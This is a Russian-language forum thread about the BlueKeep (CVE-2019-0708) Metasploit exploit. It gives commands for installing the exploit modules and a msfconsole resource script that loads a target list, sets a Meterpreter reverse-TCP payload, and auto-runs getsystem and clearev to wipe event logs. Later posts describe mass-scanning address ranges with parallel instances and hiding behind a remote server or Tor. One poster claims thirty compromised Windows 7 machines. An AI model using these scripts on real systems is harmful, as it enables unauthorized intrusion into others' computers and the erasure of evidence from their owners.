Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708). Теперь он есть в составе Metasploit Framework, но пока еще не появился в deb пакетах.

Ссылка скрыта от гостей

Выпущенный эксплоит работает на следующих ОС и конфигурациях:
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Для тех, кто хочет проверить СВОИ сервера на возможность практической реализации уязвимости, данный эксплоит его можно поставить вручную, для этого нужно с гитхаба скопировать ряд файлов и установить их в Metasploit.
Ниже привожу набор команд для установки эксплоита (пути указаны для стандартной установки Metasploit в Kali Linux):

cd ~
mkdir backup
mkdir msf
mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb ~/backup/msf

wget -O /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp
wget -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Далее стандартный запуск:

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 127.0.0.1
run

И если потребуется вернуть все на место:

mv ~/backup/msf/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ~/backup/msf/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/backup/msf/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
rm -rf /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rm -rf ~/backup/

Удачных тестирований на проникновение!

 

[Alois]

Кто нибудь поможет? Обновил версию MSF до последней, кидаю туда файлы (как сделано в инструкции в начале темы), bluekeep эксплоит не запускается, запускается только сканнер, закидываю обратно официальный, скачанный вместе с MSF, работает. Возможно официальный уже полноценно работает?

Я работаю с официальным, он работает, хоть и не во всех случаях. Хотя вряд ли это его вина. Возможно, он блокируется файрволами или антивирусами.

 

[zhe_ka]

Я работаю с официальным, он работает, хоть и не во всех случаях. Хотя вряд ли это его вина. Возможно, он блокируется файрволами или антивирусами.

На линуксе вообще картина интересная, пишет конечно Exploit completed, but no session was created., но прилетают непонятные сессии:
Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows **.**.**.**(внешний ip он же LHOST):4444 ->200.59.124.170(вообще непонятный ip):53510 (**.**.**.** ip жертвы он же rhost)
2 shell x64/windows **.**.**.**(внешний ip он же LHOST):4444 ->200.59.124.170(вообще непонятный ip):62135 (**.**.**.** ip жертвы он же rhost)
3 shell x64/windows **.**.**.**(внешний ip он же LHOST):4444 ->200.59.124.170(вообще непонятный ip):54441 (**.**.**.** ip жертвы он же rhost)
На windows просто Exploit completed, but no session was created.

 

[Alois]

На линуксе вообще картина интересная, пишет конечно Exploit completed, but no session was created., но прилетают непонятные сессии:
Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows **.**.**.**(внешний ip он же LHOST):4444 ->200.59.124.170(вообще непонятный ip):53510 (**.**.**.** ip жертвы он же rhost)
2 shell x64/windows **.**.**.**(внешний ip он же LHOST):4444 ->200.59.124.170(вообще непонятный ip):62135 (**.**.**.** ip жертвы он же rhost)
3 shell x64/windows **.**.**.**(внешний ip он же LHOST):4444 ->200.59.124.170(вообще непонятный ip):54441 (**.**.**.** ip жертвы он же rhost)
На windows просто Exploit completed, but no session was created.

На Линуксе он не работает, а на Виндоус нужно пробовать разные значения GROOMSIZE (это в advanced), ставить разные TARGET, можно пробовать одни и те же компьютеры в течении дня/дней,они могут иногда ломаться, иногда нет. Причем, TARGET=1 иногда странным образом действует и против VM. Хотя он должен действовать только против физических машин.

 

[zhe_ka]

На Линуксе он не работает, а на Виндоус нужно пробовать разные значения GROOMSIZE (это в advanced), ставить разные TARGET, можно пробовать одни и те же компьютеры в течении дня/дней,они могут иногда ломаться, иногда нет. Причем, TARGET=1 иногда странным образом действует и против VM. Хотя он должен действовать только против физических машин.

Как я понимаю пробивает только win7?

 

[Alois]

Как я понимаю пробивает только win7?

Точно не скажу, но все пробитые мной машины были с Windows 7, их пока 30 штук.

 

[zhe_ka]

Ура! Удалось поднять сессию и, кстати, поднимается и сессия и на windows и на лине (на лине eggs грузятся намного быстрее), поднял сессию на физическую win7, GROOMSIZE 100, от сюда вывод - дефолтный сканер и эксплоит работоспособны!

 

[Дмитрий Собянин]

Кто-нибудь пытался реализовать эту уязвимость через Armitage ?

 

[Alois]

Кто-нибудь пытался реализовать эту уязвимость через Armitage ?

На мой взгляд, это довольно муторно. Мне проще было написать скрипт, который сканирует и делает все сам.

 

[koshka_vasily]

кто нибудь знает почему этот эксплойт не поддерживает 32х битные машины?
и еще вопрос. кто нибудь слышал о том, что неактивированные системы не подвержены действию эксплойта?

 

[zhe_ka]

кто нибудь знает почему этот эксплойт не поддерживает 32х битные машины?
и еще вопрос. кто нибудь слышал о том, что неактивированные системы не подвержены действию эксплойта?

Да, на практике попадаются только х64, неактивированные системы пробиваются

 

[Shinobi]

у меня что то все сводится к

Exploit completed, but no session was created.

 

[Alois]

у меня что то все сводится к

Exploit completed, but no session was created.

Да, так бывает часто. Попробуйте еще раз и если не идет, пробуйте другую цель. К этой цели можно вернуться, например, на следующий день.

 

[Shinobi]

Да, так бывает часто. Попробуйте еще раз и если не идет, пробуйте другую цель. К этой цели можно вернуться, например, на следующий день.

Может есть скрипт где то на гитхабе по автоматизации?
Расстраивает в целом это напрасное ожидание, пакеты идут, сессии нету

Я так весь день в холостую просидел))

 

[Alois]

Может есть скрипт где то на гитхабе по автоматизации?
Расстраивает в целом это напрасное ожидание, пакеты идут, сессии нету

Я так весь день в холостую просидел))

На гитхабе не знаю. Мой выглядит примерно так:

msfconsole.rc
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS file:xxx
set ForceExploit true
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST eth0
set LPORT 4444
set VERBOSE true
set AutoRunScript /root/.msf4/meterpreter.rc
set GROOMSIZE 250

meterpreter.rc
getsystem
ps
clearev
background

 

[Shinobi]

На гитхабе не знаю. Мой выглядит примерно так:

msfconsole.rc
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS file:xxx
set ForceExploit true
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST eth0
set LPORT 4444
set VERBOSE true
set AutoRunScript /root/.msf4/meterpreter.rc
set GROOMSIZE 250

meterpreter.rc
getsystem
ps
clearev
background

спасибо! буду пробовать)

 

[Alois]

спасибо! буду пробовать)

Например, если у процессора 4 ядра, то я запускаю параллельно 4 метасплоита, каждый трудится по своему диапазону адресов, таким образом в час можно получать по несколько новых сессий.

 

[hellotester]

На гитхабе не знаю. Мой выглядит примерно так:

msfconsole.rc
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS file:xxx
set ForceExploit true
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST eth0
set LPORT 4444
set VERBOSE true
set AutoRunScript /root/.msf4/meterpreter.rc
set GROOMSIZE 250

meterpreter.rc
getsystem
ps
clearev
background

на 250й громобайс у тебя что то ловиться? win 2008 или только 7ки?
PS и у кого то на основе hyper -v виртуализации получалось у кого то пробить?

 

[Alois]

на 250й громобайс у тебя что то ловиться? win 2008 или только 7ки?
PS и у кого то на основе hyper -v виртуализации получалось у кого то пробить?

И 7, и 2008 ловятся. 7 где-то 95% и 2008 5%. Hyper-v не было ни одной. VMWare часто попадаются даже с Target 1.

 

[Shinobi]

Например, если у процессора 4 ядра, то я запускаю параллельно 4 метасплоита, каждый трудится по своему диапазону адресов, таким образом в час можно получать по несколько новых сессий.

долгий процесс однако
я думал быстрее будет)
запустил для теста из списка через RHOSTS

там по идее сессия должна после каждого отдельно взятого появится? или надо ждать пока весь список отработает?

ну и банальный вопрос, хочу уточнить, допустим виртуалку через мост, потом открыть порт на локальный eth0 ?


скрипт пока не запускал, оказывается, я не знал что в метасплоите можно автоматизировать команды

для меня это открытие ))

 

[Alois]

долгий процесс однако
я думал быстрее будет)
запустил для теста из списка через RHOSTS

там по идее сессия должна после каждого отдельно взятого появится? или надо ждать пока весь список отработает?

ну и банальный вопрос, хочу уточнить, допустим виртуалку через мост, потом открыть порт на локальный eth0 ?


скрипт пока не запускал, оказывается, я не знал что в метасплоите можно автоматизировать команды

для меня это открытие ))

Например, у вас есть список из 100 адресов. Запускаете 4 метасплоита в разных окнах (или в screen). В каждом метасплоите обрабатываются 25 адресов. Когда первый метасплоит прошел все 25 адресов, у вас открылось, например, две сессии. Тогда с ними можно работать.

Я делают так: захожу на виртуальный сервер с публичным постоянным IP и оттуда запускаю метасплоит, eth0 = его публичному IP. Либо так: через tor подключаюсь к интернет, получаю публичный адрес и порты открыты (у меня локальный провайдер все порты перекрыл). Правда, так сессий меньше прилетает. Если через виртуалку, то порт должен быть открыт и в виртуалке, и в роутере, и у провайдера. Поэтому лучше это делать через удаленный сервер, где все порты открыты, какие надо, и нет зависимости от провайдера.